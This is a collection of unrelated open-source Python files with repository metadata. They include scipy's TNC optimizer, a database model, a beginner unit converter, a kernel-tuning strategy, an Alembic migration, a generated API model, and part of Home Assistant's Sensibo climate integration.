maxfun : int
Maximum number of function evaluation. if None, maxfun is
set to max(100, 10*len(x0)). Defaults to None.
eta : float
Severity of the line search. if < 0 or > 1, set to 0.25.
Defaults to -1.
stepmx : float
Maximum step for the line search. May be increased during
call. If too small, it will be set to 10.0. Defaults to 0.
accuracy : float
Relative precision for finite difference calculations. If
<= machine_precision, set to sqrt(machine_precision).
Defaults to 0.
fmin : float
Minimum function value estimate. Defaults to 0.
ftol : float
Precision goal for the value of f in the stoping criterion.
If ftol < 0.0, ftol is set to 0.0 defaults to -1.
xtol : float
Precision goal for the value of x in the stopping
criterion (after applying x scaling factors). If xtol <
0.0, xtol is set to sqrt(machine_precision). Defaults to
-1.
pgtol : float
Precision goal for the value of the projected gradient in
the stopping criterion (after applying x scaling factors).
If pgtol < 0.0, pgtol is set to 1e-2 * sqrt(accuracy).
Setting it to 0.0 is not recommended. Defaults to -1.
rescale : float
Scaling factor (in log10) used to trigger f value
rescaling. If 0, rescale at each iteration. If a large
value, never rescale. If < 0, rescale is set to 1.3.
callback : callable, optional
Called after each iteration, as callback(xk), where xk is the
current parameter vector.
Returns
-------
x : list of floats
The solution.
nfeval : int
The number of function evaluations.
rc : int
Return code as defined in the RCSTRINGS dict.
See also
--------
minimize: Interface to minimization algorithms for multivariate
functions. See the 'TNC' `method` in particular.
Notes
-----
The underlying algorithm is truncated Newton, also called
Newton Conjugate-Gradient. This method differs from
scipy.optimize.fmin_ncg in that
1. It wraps a C implementation of the algorithm
2. It allows each variable to be given an upper and lower bound.
The algorithm incoporates the bound constraints by determining
the descent direction as in an unconstrained truncated Newton,
but never taking a step-size large enough to leave the space
of feasible x's. The algorithm keeps track of a set of
currently active constraints, and ignores them when computing
the minimum allowable step size. (The x's associated with the
active constraint are kept fixed.) If the maximum allowable
step size is zero then a new constraint is added. At the end
of each iteration one of the constraints may be deemed no
longer active and removed. A constraint is considered
no longer active is if it is currently active
but the gradient for that variable points inward from the
constraint. The specific constraint removed is the one
associated with the variable of largest index whose
constraint is no longer active.
References
----------
Wright S., Nocedal J. (2006), 'Numerical Optimization'
Nash S.G. (1984), "Newton-Type Minimization Via the Lanczos Method",
SIAM Journal of Numerical Analysis 21, pp. 770-778
"""
# handle fprime/approx_grad
if approx_grad:
fun = func
jac = None
elif fprime is None:
fun = MemoizeJac(func)
jac = fun.derivative
else:
fun = func
jac = fprime
if disp is not None: # disp takes precedence over messages
mesg_num = disp
else:
mesg_num = {0:MSG_NONE, 1:MSG_ITER, 2:MSG_INFO, 3:MSG_VERS,
4:MSG_EXIT, 5:MSG_ALL}.get(messages, MSG_ALL)
# build options
opts = {'eps' : epsilon,
'scale': scale,
'offset': offset,
'mesg_num': mesg_num,
'maxCGit': maxCGit,
'maxiter': maxfun,
'eta': eta,
'stepmx': stepmx,
'accuracy': accuracy,
'minfev': fmin,
'ftol': ftol,
'xtol': xtol,
'gtol': pgtol,
'rescale': rescale,
'disp': False}
res = _minimize_tnc(fun, x0, args, jac, bounds, callback=callback, **opts)
return res['x'], res['nfev'], res['status']
def _minimize_tnc(fun, x0, args=(), jac=None, bounds=None,
eps=1e-8, scale=None, offset=None, mesg_num=None,
maxCGit=-1, maxiter=None, eta=-1, stepmx=0, accuracy=0,
minfev=0, ftol=-1, xtol=-1, gtol=-1, rescale=-1, disp=False,
callback=None, **unknown_options):
"""
Minimize a scalar function of one or more variables using a truncated
Newton (TNC) algorithm.
Options for the TNC algorithm are:
eps : float
Step size used for numerical approximation of the jacobian.
scale : list of floats
Scaling factors to apply to each variable. If None, the
factors are up-low for interval bounded variables and
1+|x] fo the others. Defaults to None
offset : float
Value to substract from each variable. If None, the
offsets are (up+low)/2 for interval bounded variables
and x for the others.
disp : bool
Set to True to print convergence messages.
maxCGit : int
Maximum number of hessian*vector evaluations per main
iteration. If maxCGit == 0, the direction chosen is
-gradient if maxCGit < 0, maxCGit is set to
max(1,min(50,n/2)). Defaults to -1.
maxiter : int
Maximum number of function evaluation. if None, `maxiter` is
set to max(100, 10*len(x0)). Defaults to None.
eta : float
Severity of the line search. if < 0 or > 1, set to 0.25.
Defaults to -1.
stepmx : float
Maximum step for the line search. May be increased during
call. If too small, it will be set to 10.0. Defaults to 0.
accuracy : float
Relative precision for finite difference calculations. If
<= machine_precision, set to sqrt(machine_precision).
Defaults to 0.
minfev : float
Minimum function value estimate. Defaults to 0.
ftol : float
Precision goal for the value of f in the stoping criterion.
If ftol < 0.0, ftol is set to 0.0 defaults to -1.
xtol : float
Precision goal for the value of x in the stopping
criterion (after applying x scaling factors). If xtol <
0.0, xtol is set to sqrt(machine_precision). Defaults to
-1.
gtol : float
Precision goal for the value of the projected gradient in
the stopping criterion (after applying x scaling factors).
If gtol < 0.0, gtol is set to 1e-2 * sqrt(accuracy).
Setting it to 0.0 is not recommended. Defaults to -1.
rescale : float
Scaling factor (in log10) used to trigger f value
rescaling. If 0, rescale at each iteration. If a large
value, never rescale. If < 0, rescale is set to 1.3.
This function is called by the `minimize` function with `method=TNC`.
It is not supposed to be called directly.
"""
_check_unknown_options(unknown_options)
epsilon = eps
maxfun = maxiter
fmin = minfev
pgtol = gtol
x0 = asarray(x0, dtype=float).tolist()
n = len(x0)
if bounds is None:
bounds = [(None,None)] * n
if len(bounds) != n:
raise ValueError('length of x0 != length of bounds')
if mesg_num is not None:
messages = {0:MSG_NONE, 1:MSG_ITER, 2:MSG_INFO, 3:MSG_VERS,
4:MSG_EXIT, 5:MSG_ALL}.get(mesg_num, MSG_ALL)
elif disp:
messages = MSG_ALL
else:
messages = MSG_NONE
if jac is None:
def func_and_grad(x):
x = asarray(x)
f = fun(x, *args)
g = approx_fprime(x, fun, epsilon, *args)
return f, list(g)
else:
def func_and_grad(x):
x = asarray(x)
f = fun(x, *args)
g = jac(x, *args)
return f, list(g)
"""
low, up : the bounds (lists of floats)
if low is None, the lower bounds are removed.
if up is None, the upper bounds are removed.
low and up defaults to None
"""
low = [0]*n
up = [0]*n
for i in range(n):
if bounds[i] is None: l, u = -inf, inf
else:
l,u = bounds[i]
if l is None:
low[i] = -inf
else:
low[i] = l
if u is None:
up[i] = inf
else:
up[i] = u
if scale is None:
scale = []
if offset is None:
offset = []
if maxfun is None:
maxfun = max(100, 10*len(x0))
rc, nf, nit, x = moduleTNC.minimize(func_and_grad, x0, low, up, scale,
offset, messages, maxCGit, maxfun,
eta, stepmx, accuracy, fmin, ftol,
xtol, pgtol, rescale, callback)
xopt = array(x)
funv, jacv = func_and_grad(xopt)
return Result(x=xopt, fun=funv, jac=jacv, nfev=nf, nit=nit, status=rc,
message=RCSTRINGS[rc], success=(-1 < rc < 3))
if __name__ == '__main__':
# Examples for TNC
def example():
print("Example")
# A function to minimize
def function(x):
f = pow(x[0],2.0)+pow(abs(x[1]),3.0)
g = [0,0]
g[0] = 2.0*x[0]
g[1] = 3.0*pow(abs(x[1]),2.0)
if x[1]<0:
g[1] = -g[1]
return f, g
# Optimizer call
x, nf, rc = fmin_tnc(function, [-7, 3], bounds=([-10, 1], [10, 10]))
print("After", nf, "function evaluations, TNC returned:", RCSTRINGS[rc])
print("x =", x)
print("exact value = [0, 1]")
print()
example()
|
{
"content_hash": "dc4a2526ea0af7b28b40c19a6d86379c",
"timestamp": "",
"source": "github",
"line_count": 404,
"max_line_length": 84,
"avg_line_length": 37.35643564356435,
"alnum_prop": 0.5932282003710575,
"repo_name": "Universal-Model-Converter/UMC3.0a",
"id": "d8ea6d41ed16bc069b33f7923b2cf91c6c404a13",
"size": "16296",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/Python/x86/Lib/site-packages/scipy/optimize/tnc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "226"
},
{
"name": "C",
"bytes": "1082640"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "3621086"
},
{
"name": "CSS",
"bytes": "6226"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "FORTRAN",
"bytes": "7795"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "Groff",
"bytes": "5943"
},
{
"name": "HTML",
"bytes": "1196266"
},
{
"name": "Java",
"bytes": "5793"
},
{
"name": "Makefile",
"bytes": "1109"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "33351557"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Shell",
"bytes": "6931"
},
{
"name": "Tcl",
"bytes": "2084458"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
}
|
from Database.Controllers.Predio import Predio
from Database.Controllers.Resp_sala import Resp_sala
class Sala(object):
def __init__(self,dados=None):
if dados is not None:
self.id = dados ['id']
self.id_resp_sala = dados ['id_resp_sala']
self.codigo = dados ['codigo']
self.id_predio = dados ['id_predio']
def getId(self):
return self.id
def setId_resp_sala(self,id_resp_sala):
self.id_resp_sala = id_resp_sala
def getId_resp_sala(self):
return self.id_resp_sala
def getResp_sala(self):
return (Resp_sala().pegarResp_sala('id = %s',(self.id_resp_sala,))).getNome()
def setCodigo(self,codigo):
self.codigo = codigo
def getCodigo(self):
return self.codigo
def setId_predio(self,id_predio):
self.id_predio = id_predio
def getId_predio(self):
return self.id_predio
def getPredio(self):
return (Predio().pegarPredio('id = %s',(self.id_predio,))).getNome()
|
{
"content_hash": "8675f838bbe1922b3645380626719ce5",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 79,
"avg_line_length": 23.564102564102566,
"alnum_prop": 0.6800870511425462,
"repo_name": "AEDA-Solutions/matweb",
"id": "a9cedb135e718541a69bddfeff7e94f31f2ddd84",
"size": "919",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "backend/Database/Models/Sala.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "475557"
},
{
"name": "HTML",
"bytes": "12097161"
},
{
"name": "JavaScript",
"bytes": "190487"
},
{
"name": "PHP",
"bytes": "1122"
},
{
"name": "Python",
"bytes": "152996"
},
{
"name": "Shell",
"bytes": "80"
}
],
"symlink_target": ""
}
|
"""
Enhanced Unit Converter
This is my solution to the "Enhanced Unit Converter" problem. [1] Here, we are presented with
a simple script that runs conversions between kilometres and miles. The task at hand is to ex-
tend the script to run conversions between kilograms and pounds and fahrenheit and celsius.
[1] Saha, A. (2015). Doing Math with Python: Use Programming to Explore Algebra, Statistics,
Calculus, and More! San Francisco: No Starch Press (Ch. 1, Challenge #3).
"""
import sys
from decimal import Decimal, getcontext
getcontext().prec = 5
f_f2c = lambda x: Decimal(.5556) * Decimal(x - 32) # fahrenheit to celsius
f_c2f = lambda x: Decimal(x - 32) * Decimal(.5556) # celsius to fahrenheit
f_k2p = lambda x: Decimal(x) * Decimal(2.204600) # kilograms to pounds
f_p2k = lambda x: Decimal(x) / Decimal(2.204600) # pounds to kilograms
f_k2m = lambda x: Decimal(x) / Decimal(1.609344) # kilometres to miles
f_m2k = lambda x: Decimal(x) * Decimal(1.609344) # miles to kilometres
if __name__ == '__main__':
try:
done = False
print "==============================================="
print "= Enhanced Unit Converter"
print "= \tBy Alexander Ahmann"
print "==============================================="
while not done:
print "\nOptions to choose from:"
print "1) Convert Fahrenheit to Celsius"
print "2) Convert Celsius to Fahrenheit"
print "3) Convert Kilograms to Pounds"
print "4) Convert Pounds to Kilograms"
print "5) Convert Kilometres to Miles"
print "6) Convert Miles to Kilometres"
print "7) Exit"
operation = int(raw_input("What do you want to do? "))
if operation == 1:
x = Decimal(raw_input("Enter fahrenheits to convert: "))
print "To celsius:",f_f2c(x),raw_input("\n\nPress [ENTER] to continue...")
elif operation == 2:
x = Decimal(raw_input("Enter celsius to convert: "))
print "To fahrenheit:",f_c2f(x),raw_input("\n\nPress [ENTER] to continue...")
elif operation == 3:
x = Decimal(raw_input("Enter kilograms to convert: "))
print "To pounds:",f_k2p(x),raw_input("\n\nPress [ENTER] to continue...")
elif operation == 4:
x = Decimal(raw_input("Enter pounds to convert: "))
print "To kilograms:",f_p2k(x),raw_input("\n\nPress [ENTER] to continue...")
elif operation == 5:
x = Decimal(raw_input("Enter kilometres to convert: "))
print "To miles:",f_k2m(x),raw_input("\n\nPress [ENTER] to continue...")
elif operation == 6:
x = Decimal(raw_input("Enter miles to convert: "))
print "To kilometres:",f_m2k(x),raw_input("\n\nPress [ENTER] to continue...")
elif operation == 7:
done = True
else:
print "Please select an option between 1-7"
except:
print "Exception:",sys.exc_info()[0]
|
{
"content_hash": "661adc43026b2309da0805fe5e9f60ec",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 94,
"avg_line_length": 41.39393939393939,
"alnum_prop": 0.6504392386530015,
"repo_name": "mathmare/Misc",
"id": "a31814614ae17cd5e734b831ea340d114d5a6d8c",
"size": "2733",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Problems/DMWP/unitconvert.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "4096"
},
{
"name": "Python",
"bytes": "12134"
}
],
"symlink_target": ""
}
|
""" The differential evolution strategy that optimizes the search through the parameter space """
from scipy.optimize import differential_evolution
from kernel_tuner.searchspace import Searchspace
from kernel_tuner.strategies.minimize import get_bounds, _cost_func, scale_from_params
from kernel_tuner import util
supported_methods = ["best1bin", "best1exp", "rand1exp", "randtobest1exp",
"best2exp", "rand2exp", "randtobest1bin", "best2bin", "rand2bin", "rand1bin"]
def tune(runner, kernel_options, device_options, tuning_options):
""" Find the best performing kernel configuration in the parameter space
:params runner: A runner from kernel_tuner.runners
:type runner: kernel_tuner.runner
:param kernel_options: A dictionary with all options for the kernel.
:type kernel_options: kernel_tuner.interface.Options
:param device_options: A dictionary with all options for the device
on which the kernel should be tuned.
:type device_options: kernel_tuner.interface.Options
:param tuning_options: A dictionary with all options regarding the tuning
process.
:type tuning_options: kernel_tuner.interface.Options
:returns: A list of dictionaries for executed kernel configurations and their
execution times. And a dictionary that contains a information
about the hardware/software environment on which the tuning took place.
:rtype: list(dict()), dict()
"""
results = []
method = tuning_options.strategy_options.get("method", "best1bin")
popsize = tuning_options.strategy_options.get("popsize", 20)
maxiter = tuning_options.strategy_options.get("maxiter", 50)
tuning_options["scaling"] = False
# build a bounds array as needed for the optimizer
bounds = get_bounds(tuning_options.tune_params)
args = (kernel_options, tuning_options, runner, results)
# ensure particles start from legal points
searchspace = Searchspace(tuning_options, runner.dev.max_threads)
population = list(list(p) for p in searchspace.get_random_sample(popsize))
# call the differential evolution optimizer
opt_result = None
try:
opt_result = differential_evolution(_cost_func, bounds, args, maxiter=maxiter, popsize=popsize, init=population,
polish=False, strategy=method, disp=tuning_options.verbose)
except util.StopCriterionReached as e:
if tuning_options.verbose:
print(e)
if opt_result and tuning_options.verbose:
print(opt_result.message)
return results, runner.dev.get_environment()
|
{
"content_hash": "0cc7d75c9a3db067545234063e22425a",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 120,
"avg_line_length": 39.71212121212121,
"alnum_prop": 0.7134681419305609,
"repo_name": "benvanwerkhoven/kernel_tuner",
"id": "30cee8c1fa7c07752c5497659a074509f47661b3",
"size": "2621",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kernel_tuner/strategies/diff_evo.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Cuda",
"bytes": "3766"
},
{
"name": "Python",
"bytes": "425339"
}
],
"symlink_target": ""
}
|
"""Create table GenomicGCROutreachEscalationNotified
Revision ID: b7971e81863c
Revises: b64334fe7ec7, 68e4e375cec3
Create Date: 2022-11-08 16:46:57.006039
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'b7971e81863c'
down_revision = ('b64334fe7ec7', '68e4e375cec3')
branch_labels = None
depends_on = None
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_rdr():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('genomic_gcr_outreach_escalation_notified',
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('created', sa.DateTime(), nullable=True),
sa.Column('modified', sa.DateTime(), nullable=True),
sa.Column('participant_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['participant_id'], ['participant.participant_id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_genomic_gcr_outreach_escalation_notified_participant_id'), 'genomic_gcr_outreach_escalation_notified', ['participant_id'], unique=False)
# ### end Alembic commands ###
def downgrade_rdr():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_genomic_gcr_outreach_escalation_notified_participant_id'), table_name='genomic_gcr_outreach_escalation_notified')
op.drop_table('genomic_gcr_outreach_escalation_notified')
# ### end Alembic commands ###
def upgrade_metrics():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_metrics():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
|
{
"content_hash": "ae9a5b4005d74e766e52574fc67cb662",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 165,
"avg_line_length": 31.11864406779661,
"alnum_prop": 0.6944444444444444,
"repo_name": "all-of-us/raw-data-repository",
"id": "eef8265a3e54fc10d3468d79f4ed1cc49ef1f93f",
"size": "1836",
"binary": false,
"copies": "1",
"ref": "refs/heads/devel",
"path": "rdr_service/alembic/versions/b7971e81863c_create_table_.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1866"
},
{
"name": "Mako",
"bytes": "1715"
},
{
"name": "Python",
"bytes": "17040924"
},
{
"name": "R",
"bytes": "2212"
},
{
"name": "Shell",
"bytes": "92213"
}
],
"symlink_target": ""
}
|
"""
The MIT License (MIT)
Copyright (c) 2017 LeanIX GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
class Document:
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
self.swaggerTypes = {
'ID': 'str',
'name': 'str',
'url': 'str',
'topic': 'str',
'version': 'str',
'documentTypeID': 'str',
'referenceSystem': 'str',
'referenceType': 'str',
'referenceID': 'str',
'referenceSyncTime': 'str',
'description': 'str',
'factSheetHasDocuments': 'list[FactSheetHasDocument]'
}
self.ID = None # str
self.name = None # str
self.url = None # str
self.topic = None # str
self.version = None # str
self.documentTypeID = None # str
self.referenceSystem = None # str
self.referenceType = None # str
self.referenceID = None # str
self.referenceSyncTime = None # str
self.description = None # str
self.factSheetHasDocuments = None # list[FactSheetHasDocument]
|
{
"content_hash": "cf8d462d7cd43cb3ef18e48e1cb23c21",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 105,
"avg_line_length": 39.067796610169495,
"alnum_prop": 0.6646420824295011,
"repo_name": "leanix/leanix-sdk-python",
"id": "44dfa24f9745bea4e752702b27f37e0963b92fde",
"size": "2327",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/leanix/models/Document.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1555496"
},
{
"name": "Scala",
"bytes": "1911"
}
],
"symlink_target": ""
}
|
def run(impl):
impl.save_file('file', 'First line\nThis is the second line\n')
impl.add_new_file('file')
impl.commit_all('Add files')
impl.save_file('file', 'First line\nThis is the \tsecond line \nThe last line\n')
return []
|
{
"content_hash": "9292db926667b4ad5159c8079e2405e5",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 89,
"avg_line_length": 30,
"alnum_prop": 0.6666666666666666,
"repo_name": "erdavila/git-svn-diff",
"id": "be557012d763177a04861a0757455bc3c3bc2c97",
"size": "240",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/cases/options_for_git_diff.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38096"
}
],
"symlink_target": ""
}
|
"""Support for Sensibo wifi-enabled home thermostats."""
import asyncio
import logging
import aiohttp
import async_timeout
import pysensibo
import voluptuous as vol
from homeassistant.components.climate import PLATFORM_SCHEMA, ClimateEntity
from homeassistant.components.climate.const import (
HVAC_MODE_COOL,
HVAC_MODE_DRY,
HVAC_MODE_FAN_ONLY,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
SUPPORT_FAN_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_STATE,
ATTR_TEMPERATURE,
CONF_API_KEY,
CONF_ID,
STATE_ON,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.util.temperature import convert as convert_temperature
from .const import DOMAIN as SENSIBO_DOMAIN
_LOGGER = logging.getLogger(__name__)
ALL = ["all"]
TIMEOUT = 10
SERVICE_ASSUME_STATE = "assume_state"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_ID, default=ALL): vol.All(cv.ensure_list, [cv.string]),
}
)
ASSUME_STATE_SCHEMA = vol.Schema(
{vol.Optional(ATTR_ENTITY_ID): cv.entity_ids, vol.Required(ATTR_STATE): cv.string}
)
_FETCH_FIELDS = ",".join(
[
"room{name}",
"measurements",
"remoteCapabilities",
"acState",
"connectionStatus{isAlive}",
"temperatureUnit",
]
)
_INITIAL_FETCH_FIELDS = f"id,{_FETCH_FIELDS}"
FIELD_TO_FLAG = {
"fanLevel": SUPPORT_FAN_MODE,
"swing": SUPPORT_SWING_MODE,
"targetTemperature": SUPPORT_TARGET_TEMPERATURE,
}
SENSIBO_TO_HA = {
"cool": HVAC_MODE_COOL,
"heat": HVAC_MODE_HEAT,
"fan": HVAC_MODE_FAN_ONLY,
"auto": HVAC_MODE_HEAT_COOL,
"dry": HVAC_MODE_DRY,
}
HA_TO_SENSIBO = {value: key for key, value in SENSIBO_TO_HA.items()}
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up Sensibo devices."""
client = pysensibo.SensiboClient(
config[CONF_API_KEY], session=async_get_clientsession(hass), timeout=TIMEOUT
)
devices = []
try:
for dev in await client.async_get_devices(_INITIAL_FETCH_FIELDS):
if config[CONF_ID] == ALL or dev["id"] in config[CONF_ID]:
devices.append(
SensiboClimate(client, dev, hass.config.units.temperature_unit)
)
except (
aiohttp.client_exceptions.ClientConnectorError,
asyncio.TimeoutError,
pysensibo.SensiboError,
) as err:
_LOGGER.exception("Failed to connect to Sensibo servers")
raise PlatformNotReady from err
if not devices:
return
async_add_entities(devices)
async def async_assume_state(service):
"""Set state according to external service call.."""
entity_ids = service.data.get(ATTR_ENTITY_ID)
if entity_ids:
target_climate = [
device for device in devices if device.entity_id in entity_ids
]
else:
target_climate = devices
update_tasks = []
for climate in target_climate:
await climate.async_assume_state(service.data.get(ATTR_STATE))
update_tasks.append(climate.async_update_ha_state(True))
if update_tasks:
await asyncio.wait(update_tasks)
hass.services.async_register(
SENSIBO_DOMAIN,
SERVICE_ASSUME_STATE,
async_assume_state,
schema=ASSUME_STATE_SCHEMA,
)
class SensiboClimate(ClimateEntity):
"""Representation of a Sensibo device."""
def __init__(self, client, data, units):
"""Build SensiboClimate.
client: aiohttp session.
data: initially-fetched data.
"""
self._client = client
self._id = data["id"]
self._external_state = None
self._units = units
self._available = False
self._do_update(data)
@property
def supported_features(self):
"""Return the list of supported features."""
return self._supported_features
def _do_update(self, data):
self._name = data["room"]["name"]
self._measurements = data["measurements"]
self._ac_states = data["acState"]
self._available = data["connectionStatus"]["isAlive"]
capabilities = data["remoteCapabilities"]
self._operations = [SENSIBO_TO_HA[mode] for mode in capabilities["modes"]]
self._operations.append(HVAC_MODE_OFF)
self._current_capabilities = capabilities["modes"][self._ac_states["mode"]]
temperature_unit_key = data.get("temperatureUnit") or self._ac_states.get(
"temperatureUnit"
)
if temperature_unit_key:
self._temperature_unit = (
TEMP_CELSIUS if temperature_unit_key == "C" else TEMP_FAHRENHEIT
)
self._temperatures_list = (
self._current_capabilities["temperatures"]
.get(temperature_unit_key, {})
.get("values", [])
)
else:
self._temperature_unit = self._units
self._temperatures_list = []
self._supported_features = 0
for key in self._ac_states:
if key in FIELD_TO_FLAG:
self._supported_features |= FIELD_TO_FLAG[key]
@property
def state(self):
"""Return the current state."""
return self._external_state or super().state
@property
def extra_state_attributes(self):
"""Return the state attributes."""
return {"battery": self.current_battery}
@property
def temperature_unit(self):
"""Return the unit of measurement which this thermostat uses."""
return self._temperature_unit
@property
def available(self):
"""Return True if entity is available."""
return self._available
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._ac_states.get("targetTemperature")
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
if self.temperature_unit == self.hass.config.units.temperature_unit:
# We are working in same units as the a/c unit. Use whole degrees
# like the API supports.
return 1
# Unit conversion is going on. No point to stick to specific steps.
return None
@property
def hvac_mode(self):
"""Return current operation ie. heat, cool, idle."""
if not self._ac_states["on"]:
return HVAC_MODE_OFF
return SENSIBO_TO_HA.get(self._ac_states["mode"])
@property
def current_humidity(self):
"""Return the current humidity."""
return self._measurements["humidity"]
@property
def current_battery(self):
"""Return the current battery voltage."""
return self._measurements.get("batteryVoltage")
@property
def current_temperature(self):
"""Return the current temperature."""
# This field is not affected by temperatureUnit.
# It is always in C
return convert_temperature(
self._measurements["temperature"], TEMP_CELSIUS, self.temperature_unit
)
@property
def hvac_modes(self):
"""List of available operation modes."""
return self._operations
@property
def fan_mode(self):
"""Return the fan setting."""
return self._ac_states.get("fanLevel")
@property
def fan_modes(self):
"""List of available fan modes."""
return self._current_capabilities.get("fanLevels")
@property
def swing_mode(self):
"""Return the fan setting."""
return self._ac_states.get("swing")
@property
def swing_modes(self):
"""List of available swing modes."""
return self._current_capabilities.get("swing")
@property
def name(self):
"""Return the name of the entity."""
return self._name
@property
def min_temp(self):
"""Return the minimum temperature."""
return (
self._temperatures_list[0] if self._temperatures_list else super().min_temp
)
@property
def max_temp(self):
"""Return the maximum temperature."""
return (
self._temperatures_list[-1] if self._temperatures_list else super().max_temp
)
@property
def unique_id(self):
"""Return unique ID based on Sensibo ID."""
return self._id
async def async_set_temperature(self, **kwargs):
"""Set new target temperature."""
temperature = kwargs.get(ATTR_TEMPERATURE)
if temperature is None:
return
temperature = int(temperature)
if temperature not in self._temperatures_list:
# Requested temperature is not supported.
if temperature == self.target_temperature:
return
index = self._temperatures_list.index(self.target_temperature)
if (
temperature > self.target_temperature
and index < len(self._temperatures_list) - 1
):
temperature = self._temperatures_list[index + 1]
elif temperature < self.target_temperature and index > 0:
temperature = self._temperatures_list[index - 1]
else:
return
with async_timeout.timeout(TIMEOUT):
await self._client.async_set_ac_state_property(
self._id, "targetTemperature", temperature, self._ac_states
)
async def async_set_fan_mode(self, fan_mode):
"""Set new target fan mode."""
with async_timeout.timeout(TIMEOUT):
await self._client.async_set_ac_state_property(
self._id, "fanLevel", fan_mode, self._ac_states
)
async def async_set_hvac_mode(self, hvac_mode):
"""Set new target operation mode."""
if hvac_mode == HVAC_MODE_OFF:
with async_timeout.timeout(TIMEOUT):
await self._client.async_set_ac_state_property(
self._id, "on", False, self._ac_states
)
return
# Turn on if not currently on.
if not self._ac_states["on"]:
with async_timeout.timeout(TIMEOUT):
await self._client.async_set_ac_state_property(
self._id, "on", True, self._ac_states
)
with async_timeout.timeout(TIMEOUT):
await self._client.async_set_ac_state_property(
self._id, "mode", HA_TO_SENSIBO[hvac_mode], self._ac_states
)
async def async_set_swing_mode(self, swing_mode):
"""Set new target swing operation."""
with async_timeout.timeout(TIMEOUT):
await self._client.async_set_ac_state_property(
self._id, "swing", swing_mode, self._ac_states
)
async def async_turn_on(self):
"""Turn Sensibo unit on."""
with async_timeout.timeout(TIMEOUT):
await self._client.async_set_ac_state_property(
self._id, "on", True, self._ac_states
)
async def async_turn_off(self):
"""Turn Sensibo unit on."""
with async_timeout.timeout(TIMEOUT):
await self._client.async_set_ac_state_property(
self._id, "on", False, self._ac_states
)
async def async_assume_state(self, state):
"""Set external state."""
change_needed = (state != HVAC_MODE_OFF and not self._ac_states["on"]) or (
state == HVAC_MODE_OFF and self._ac_states["on"]
)
if change_needed:
with async_timeout.timeout(TIMEOUT):
await self._client.async_set_ac_state_property(
self._id,
"on",
state != HVAC_MODE_OFF, # value
self._ac_states,
True, # assumed_state
)
if state in [STATE_ON, HVAC_MODE_OFF]:
self._external_state = None
else:
self._external_state = state
async def async_update(self):
"""Retrieve latest state."""
try:
